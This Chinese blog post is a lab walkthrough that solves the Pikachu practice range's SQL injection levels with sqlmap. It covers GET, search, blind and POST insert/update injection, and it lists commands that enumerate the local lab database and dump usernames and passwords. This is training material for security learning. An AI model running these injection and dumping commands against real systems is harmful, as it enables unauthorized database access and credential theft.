pikachu靶场SQL,sqlmap解法

已于 2022-07-31 21:23:14 修改
阅读量2.1k 收藏 18
点赞数 3
文章标签: sql 数据库 web安全 mysql linux
于 2022-07-31 20:59:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/126089900
版权

GET型输入

字符型注入(此处细说):

随便输入点什么

URL

http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2

1.寻找注入点

sqlmap -u "URL"

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2"

找到输入点为name处

2.寻找当前数据库

sqlmap -u"URL" --current-db

sqlmap -u"http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" --current-db

 

数据库为pikachu

3.寻找数据库为pikachu的所有表

sqlmap -u "URL" -D 数据库名 --tables

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

 

4.寻找表中的所有字段:

sqlmap -u "URL"  -D 数据库名 -T 表名 --columns

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns

 

5.寻找字段里面的值:

sqlmap -u "URL" -D 数据库名 -T 表名-C 字段1,字段2 --dump

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password --dump

得到用户名密码

搜索型注入

URL:

http://192.168.56.1/pikachu2/vul/sqli/sqli_search.php?name=1&submit=1

命令:

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_search.php?name=1&submit=1" -D pikachu -T users -C password --dump

xx型注入

URL:

http://192.168.56.1/pikachu2/vul/sqli/sqli_x.php?name=1&submit=1

命令:

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_x.php?name=1&submit=1" -D pikachu -T users -C password --dump

盲注base on boolian

URL:

http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_b.php?name=222&submit=%E6%9F%A5%E8%AF%A2

命令:

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_b.php?name=222&submit=1" -D pikachu -T users -C password --dump

盲注base on time

URL

http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_t.php?name=121&submit=1

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_t.php?name=121&submit=1" -D pikachu -T users -C password --dump

POST型注入

insert/update注入

insert注入

URL

http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_reg.php

在注册账号处抓包

使用sqlmap

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_reg.php"  --data="username=1111&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit"  -D pikachu -T users -C password --dump

sqlmap -u "URL" --data="表单名和表单值(bp上直接复制粘贴)" -D 数据库名 -T 表名 -C 字段名 --dump

 

全按y

 这里按1

这里按1

得到密码:

update注入

先登入进去一个注册的账号,然后点击修改个人信息

URL

http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_edit.php

填写信息后用bp抓包,点击submit

输入命令:

sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_edit.php"  --data="sex=31231&phonenum=31231&add=3131&email=3131&submit=submit"  -D pikachu -T users -C password --dump

sqlmap -u "URL" --data="sex=31231&phonenum=31231&add=3131&email=3131&submit=submit(把表单复制粘贴过来)" -D 数据库名-T 用户名 -C 字段1 --dump

 

这里一个一个试,1可以 

有多个注射点,请选择一个注射点进行以下注射:  

[0]位置:POST,参数:sex,类型:单引号字符串(默认)  

[1]位置:POST,参数:phonenum,类型:单引号字符串  

位置:POST,参数:add,类型:单引号字符串  

[3]位置:POST,参数:email,类型:单引号字符串  

[问]退出

 得到密码

墨言ink
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
pikachu靶场环境
02-12
pikachu靶场环境
pikachu 靶场通关(全)
最新发布
qq_53058639的博客
04-24 363
发现同一个验证码我们重复使用了多次,返回的结果时用户名或密码错误,并没有提示验证码失效,也就是只要我们这个页面不刷新,就可以一直用这个验证码,那就跟第一关一样,直接ctrl+i拿去爆破,得到了跟上面一样的用户名跟密码。//union语句聚合两个查询的内容,由于页面只返回一行,所以在前面的输入一个不存在的id,我这里直接使-号,以返回我们输入的内容,这里页面上将1,2都返回了,得知两个字段都有回显,经过查找发现是在密码输入框的下方多一个隐藏的输入框,记录的是token的信息,那么直接拿去burp上开始爆破!
web安全之通过sqlmap工具进行靶场练习
记录学习,一起进步
12-07 1017
web安全之通过sqlmap工具对靶场进行练习
Pikachu漏洞练习平台实验——SQL注入
m0_73826804的博客
02-22 1651
SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。比如我们期望用户输入整数的id,但是用户输入了上图中下面的语句,这是条能被正常执行的SQL语句,导致表中的数据都会输出。
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场网盘下载
04-01
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。
Sqlmappikachu的GET请求注入漏洞测试
weixin_62943062的博客
07-12 3247
Sqlmappikachu的GET请求注入漏洞测试
皮卡丘(pikachu)SQL注入(手工和工具举例)
weixin_44787832的博客
07-21 4086
我们以数字型(使用sqlmap)和整数型(使用手工注入)举一个例子 数字型注入(POST) 我们使用了sqlmap 选择1点击查询并抓包 将抓下来的数据全部复制在一个记事本里,命名为1.txt 使用命令 python sqlmap.py –r 111.txt –current-db 爆出数据库:pikachu 之后爆破表:python sqlmap.py –r 111.txt –D pikachu -tables 爆出表 在之后找一个表去爆列名 python
通过SqlMappikachu平台进行注入
weixin_52347768的博客
11-24 1643
课上学习笔记
Pikachu靶场——SQL注入漏洞
来日可期的博客
10-06 1264
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场SQL注入
2303_79340715的博客
03-17 1511
个人觉得SQL注入还是挺难的,关键点在于找SQL语句的闭合,文章会比较长,要是能一关一关对着看的话,会对你有不少好处滴!!!当然啦,手搓重要,学会用sqlmap也是挺重要的哦,主要是我还不会~爆账号密码之类的信息再插一句:设置靶场的人已经告诉我们数据库是mysql了。
sql注入——pikachu靶场
cjh12340826的博客
07-20 568
(1)先用burpsuit抓包,或使用浏览器开发者工具找到请求data。10,时间盲注,原理:如果可以注入,就延时,如果不行就立刻显示。6,detele注入使用hackbar(报错显示数据库)12,------- 基于报错信息获取---------然后使用hackbar点击post data发送请求。注册用户时注入,使用重发器(基于报错信息获取)7,http header和cookie注入。工具:burpsuit,hackbar。5,insert,update注入。在修改信息页面:提交修改,
sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注
07-06 3370
sqlmap-跑盲注靶场
Pikachu-----Sql Inject(SQL注入)
m0_65712192的博客
12-29 1959
Pikachu-----Sql Inject(SQL注入)
【网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具)
m0_67844671的博客
10-03 2033
本篇文章详细介绍了sqlmap工具和使用,如何用sqlmap进行自动化的SQL注入,还讲解了穿山甲,萝卜头等自动化SQL注入工具
pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 6175
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL中修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入点(3)输入的SQL语句能否不报错(我们的语句能够成功闭合)(selectusername,passwordf。......
pikachu靶场sqlmap通关
07-29
很高兴为您提供帮助!要在Pikachu靶场上通过SQLMap,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了SQLMap工具。您可以从官方网站(https://sqlmap.org/)或GitHub仓库(https://github.com/sqlmapproject/sqlmap)下载和安装它。 2. 打开命令行界面,并导航到SQLMap的安装目录。 3. 接下来,您需要收集关于Pikachu靶场的目标URL和其他相关信息。这包括目标网站的URL、可能存在SQL注入漏洞的参数等。 4. 运行以下命令来测试目标网站是否存在SQL注入漏洞: ``` python sqlmap.py -u <目标URL> --dbs ``` 这将尝试检测数据库是否存在。如果成功,它将列出所有可用的数据库。 5. 一旦确定存在漏洞,您可以进一步探索数据库并执行其他操作,例如列出表、提取数据等。以下是一个示例命令: ``` python sqlmap.py -u <目标URL> -D <数据库名称> --tables ``` 这将列出指定数据库中的所有表。 6. 根据需要,您可以使用SQLMap的其他功能和选项来执行更高级的操作。请参阅SQLMap的官方文档以获取更多详细信息和示例。 请注意,在进行任何安全测试和渗透测试时,您必须遵循合法和道德的原则,并获得所有相关授权,以避免非法活动和侵犯他人的隐私。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值